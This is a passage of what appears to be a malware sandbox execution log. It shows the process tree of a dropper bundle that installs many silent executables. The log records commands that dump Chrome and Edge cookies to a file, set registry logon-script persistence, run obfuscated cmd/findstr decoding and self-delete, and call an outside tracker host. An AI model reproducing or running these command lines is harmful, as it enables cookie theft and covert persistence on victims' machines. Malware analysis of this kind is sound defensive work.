                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                          PID:8164
                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                          7⤵
                                                                            PID:4592
                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:7196
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                              7⤵
                                                                                PID:7256
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                  PID:7396
                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                  7⤵
                                                                                    PID:5020
                                                                              • C:\Users\Admin\Documents\SRk7lU6F4XwYIqXEt2lklni8.exe
                                                                                "C:\Users\Admin\Documents\SRk7lU6F4XwYIqXEt2lklni8.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:4132
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 660
                                                                                  6⤵
                                                                                  • Program crash
                                                                                  PID:4292
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 696
                                                                                  6⤵
                                                                                  • Program crash
                                                                                  PID:6288
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 704
                                                                                  6⤵
                                                                                  • Program crash
                                                                                  PID:6780
                                                                              • C:\Users\Admin\Documents\dfTk1nJnIzatgWXDRYGmUx0a.exe
                                                                                "C:\Users\Admin\Documents\dfTk1nJnIzatgWXDRYGmUx0a.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:3964
                                                                              • C:\Users\Admin\Documents\OxkkM5SDGnR9IuyLRKAbWS5J.exe
                                                                                "C:\Users\Admin\Documents\OxkkM5SDGnR9IuyLRKAbWS5J.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Checks BIOS information in registry
                                                                                • Checks whether UAC is enabled
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:1456
                                                                              • C:\Users\Admin\Documents\jG875JdywPh3NzDWK2TUJ_gd.exe
                                                                                "C:\Users\Admin\Documents\jG875JdywPh3NzDWK2TUJ_gd.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Checks BIOS information in registry
                                                                                • Checks whether UAC is enabled
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:1512
                                                                              • C:\Users\Admin\Documents\gNuOqGKy1Yc8ILnt_07caihE.exe
                                                                                "C:\Users\Admin\Documents\gNuOqGKy1Yc8ILnt_07caihE.exe"
                                                                                5⤵
                                                                                  PID:192
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-PSJCM.tmp\gNuOqGKy1Yc8ILnt_07caihE.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-PSJCM.tmp\gNuOqGKy1Yc8ILnt_07caihE.tmp" /SL5="$204E4,138429,56832,C:\Users\Admin\Documents\gNuOqGKy1Yc8ILnt_07caihE.exe"
                                                                                    6⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:6592
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2GK6T.tmp\Setup.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2GK6T.tmp\Setup.exe" /Verysilent
                                                                                      7⤵
                                                                                        PID:7716
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                          8⤵
                                                                                            PID:7848
                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629494036 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                              9⤵
                                                                                                PID:4884
                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4148
                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmp5C5E_tmp.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\tmp5C5E_tmp.exe"
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4420
                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                          6⤵
                                                                                            PID:5700
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                            6⤵
                                                                                              PID:3864
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd
                                                                                                7⤵
                                                                                                  PID:6808
                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                    8⤵
                                                                                                      PID:7080
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                      Esplorarne.exe.com i
                                                                                                      8⤵
                                                                                                        PID:7080
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                          9⤵
                                                                                                            PID:5436
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                              10⤵
                                                                                                                PID:7020
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping RJMQBVDN -n 30
                                                                                                            8⤵
                                                                                                            • Runs ping.exe
                                                                                                            PID:3116
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1556
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:3872
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2320
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-JQ24N.tmp\Inlog.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-JQ24N.tmp\Inlog.tmp" /SL5="$401E8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:1068
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-S21N5.tmp\Setup.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-S21N5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5412
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-OPE8U.tmp\Setup.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-OPE8U.tmp\Setup.tmp" /SL5="$3045C,17366757,721408,C:\Users\Admin\AppData\Local\Temp\is-S21N5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:6180
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                    4⤵
                                                                                                      PID:6600
                                                                                                      • C:\Windows\SysWOW64\expand.exe
                                                                                                        expand C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                        5⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:7016
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                      4⤵
                                                                                                        PID:6140
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                          5⤵
                                                                                                            PID:4956
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\vdi_compiler.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\vdi_compiler"
                                                                                                          4⤵
                                                                                                            PID:6364
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\vdi_compiler.exe"
                                                                                                              5⤵
                                                                                                                PID:5904
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping localhost -n 4
                                                                                                                  6⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:7612
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                              4⤵
                                                                                                                PID:6156
                                                                                                              • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                                "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                                4⤵
                                                                                                                  PID:5528
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-CG72V.tmp\WEATHER Manager.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-CG72V.tmp\WEATHER Manager.tmp" /SL5="$10280,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:2812
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\Setup.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates connected drives
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:4140
                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629494036 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                3⤵
                                                                                                                  PID:5572
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4792
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                              1⤵
                                                                                                              • Process spawned unexpected child process
                                                                                                              PID:4428
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:4188
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 624
                                                                                                                  3⤵
                                                                                                                  • Program crash
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:384
                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                              1⤵
                                                                                                              • Enumerates connected drives
                                                                                                              • Drops file in Windows directory
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1316
                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding BCFE9BEC275901409AB41F7944EF276C C
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:6124
                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding F4E4EDBC0BCABDD4E7D073D8E98445D5 C
                                                                                                                2⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:2404
                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 7F21C87E709EEAE59E4C72D5F1EB630B
                                                                                                                2⤵
                                                                                                                  PID:5708
                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 7E8015A946B1B97E4246B1454BD0C664 C
                                                                                                                  2⤵
                                                                                                                    PID:7320
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                    2⤵
                                                                                                                      PID:7988
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                        3⤵
                                                                                                                          PID:6612
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                            4⤵
                                                                                                                              PID:4328
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ff96c7adec0,0x7ff96c7aded0,0x7ff96c7adee0
                                                                                                                                5⤵
                                                                                                                                  PID:6184
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                    C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff654199e70,0x7ff654199e80,0x7ff654199e90
                                                                                                                                    6⤵
                                                                                                                                      PID:6800
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=1864 /prefetch:8
                                                                                                                                    5⤵
                                                                                                                                      PID:6172
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=1792 /prefetch:8
                                                                                                                                      5⤵
                                                                                                                                        PID:7852
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:2
                                                                                                                                        5⤵
                                                                                                                                          PID:7348
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2604 /prefetch:1
                                                                                                                                          5⤵
                                                                                                                                            PID:6564
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2560 /prefetch:1
                                                                                                                                            5⤵
                                                                                                                                              PID:6460
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3164 /prefetch:2
                                                                                                                                              5⤵
                                                                                                                                                PID:6400
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=3196 /prefetch:8
                                                                                                                                                5⤵
                                                                                                                                                  PID:6200
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=3576 /prefetch:8
                                                                                                                                                  5⤵
                                                                                                                                                    PID:6820
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=3480 /prefetch:8
                                                                                                                                                    5⤵
                                                                                                                                                      PID:7432
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=1588 /prefetch:8
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5512
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,1516485807666178124,7269556318373645891,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4328_1970707764" --mojo-platform-channel-handle=2128 /prefetch:8
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4680
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_89F7.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:8084
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5860
                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:7172
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                        1⤵
                                                                                                                                                          PID:8052
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                          1⤵
                                                                                                                                                            PID:7232
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                            1⤵
                                                                                                                                                              PID:7644
                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5832
